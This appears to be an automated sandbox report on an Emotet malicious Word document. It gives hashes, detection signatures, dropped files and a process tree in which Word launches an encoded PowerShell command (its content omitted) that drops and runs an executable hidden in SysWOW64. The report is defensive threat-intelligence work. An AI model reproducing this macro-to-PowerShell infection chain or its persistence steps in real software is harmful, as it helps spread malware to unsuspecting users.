Analysis

  • max time kernel
    132s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    14-10-2020 23:02

General

  • Target

    emotet_e1_a49020010a8e7d4bc405bcc23b9351dc19467c3d466e2d903c6df903668d51cc_2020-10-14__230041998141._doc.doc

  • Size

    132KB

  • MD5

    40409631a9fb83e1ab8d02c2f8fa216d

  • SHA1

    e6b8170c2ca200cb38d26a9ad836bc596d38ba6d

  • SHA256

    a49020010a8e7d4bc405bcc23b9351dc19467c3d466e2d903c6df903668d51cc

  • SHA512

    b83ee57533375a8642b71463cbdf27f9ccfdea2d71ed90f21c4bbe4942276c2519446d0c15548d36d985dd9b999be0f946934a8261b5e1a85a8adafc6c89e3ea

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs

Extracted

Family

emotet

Botnet

Epoch1

C2


rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Blacklisted process makes network request 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_a49020010a8e7d4bc405bcc23b9351dc19467c3d466e2d903c6df903668d51cc_2020-10-14__230041998141._doc.doc"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1448
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -ENCOD <base64-encoded command omitted>
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1592
    • C:\Users\Admin\B20dyak\Ovpqho4\V9ofyxp.exe
      "C:\Users\Admin\B20dyak\Ovpqho4\V9ofyxp.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:304
      • C:\Windows\SysWOW64\KBDGKL\icsunattend.exe
        "C:\Windows\SysWOW64\KBDGKL\icsunattend.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        PID:684

Downloads

  • C:\Users\Admin\B20DYak\ovPQHo4\V9ofyxp.exe
    MD5

    20882a2bd7e91707fcede0f3b603442c

    SHA1

    8e84e509a3a9c62198ef56684b132a2039829d54

    SHA256

    8c7d0b3a83c3605f4cb779efbe7ba74c32b8505e25db1ff832d14492894a1d9d

    SHA512

    3c89aaf0bb7a3d7829dd1e672a3b9c4d2a88daccd4f4c20e919e21c498f933669d186bcc01501662002ccbb84e99ec53e1206f375772aed8fb385d04632aa354

  • C:\Users\Admin\B20dyak\Ovpqho4\V9ofyxp.exe
    MD5

    20882a2bd7e91707fcede0f3b603442c

    SHA1

    8e84e509a3a9c62198ef56684b132a2039829d54

    SHA256

    8c7d0b3a83c3605f4cb779efbe7ba74c32b8505e25db1ff832d14492894a1d9d

    SHA512

    3c89aaf0bb7a3d7829dd1e672a3b9c4d2a88daccd4f4c20e919e21c498f933669d186bcc01501662002ccbb84e99ec53e1206f375772aed8fb385d04632aa354

  • C:\Windows\SysWOW64\KBDGKL\icsunattend.exe
    MD5

    20882a2bd7e91707fcede0f3b603442c

    SHA1

    8e84e509a3a9c62198ef56684b132a2039829d54

    SHA256

    8c7d0b3a83c3605f4cb779efbe7ba74c32b8505e25db1ff832d14492894a1d9d

    SHA512

    3c89aaf0bb7a3d7829dd1e672a3b9c4d2a88daccd4f4c20e919e21c498f933669d186bcc01501662002ccbb84e99ec53e1206f375772aed8fb385d04632aa354

  • \Windows\SysWOW64\KBDGKL\icsunattend.exe
    MD5

    20882a2bd7e91707fcede0f3b603442c

    SHA1

    8e84e509a3a9c62198ef56684b132a2039829d54

    SHA256

    8c7d0b3a83c3605f4cb779efbe7ba74c32b8505e25db1ff832d14492894a1d9d

    SHA512

    3c89aaf0bb7a3d7829dd1e672a3b9c4d2a88daccd4f4c20e919e21c498f933669d186bcc01501662002ccbb84e99ec53e1206f375772aed8fb385d04632aa354

  • memory/304-17-0x0000000000560000-0x000000000057E000-memory.dmp
    Filesize

    120KB

  • memory/304-16-0x0000000000540000-0x000000000055F000-memory.dmp
    Filesize

    124KB

  • memory/304-13-0x0000000000000000-mapping.dmp
  • memory/596-23-0x000007FEF7C00000-0x000007FEF7E7A000-memory.dmp
    Filesize

    2.5MB

  • memory/684-19-0x0000000000000000-mapping.dmp
  • memory/684-21-0x00000000003A0000-0x00000000003BF000-memory.dmp
    Filesize

    124KB

  • memory/684-22-0x00000000003C0000-0x00000000003DE000-memory.dmp
    Filesize

    120KB

  • memory/1448-2-0x0000000008AF0000-0x0000000008AF4000-memory.dmp
    Filesize

    16KB

  • memory/1448-3-0x0000000006E60000-0x0000000007060000-memory.dmp
    Filesize

    2.0MB

  • memory/1592-12-0x000000001B970000-0x000000001B971000-memory.dmp
    Filesize

    4KB

  • memory/1592-11-0x000000001A8A0000-0x000000001A8A1000-memory.dmp
    Filesize

    4KB

  • memory/1592-10-0x0000000002480000-0x0000000002481000-memory.dmp
    Filesize

    4KB

  • memory/1592-9-0x00000000023C0000-0x00000000023C1000-memory.dmp
    Filesize

    4KB

  • memory/1592-8-0x000000001ACF0000-0x000000001ACF1000-memory.dmp
    Filesize

    4KB

  • memory/1592-7-0x0000000002380000-0x0000000002381000-memory.dmp
    Filesize

    4KB

  • memory/1592-6-0x000007FEF19B0000-0x000007FEF239C000-memory.dmp
    Filesize

    9.9MB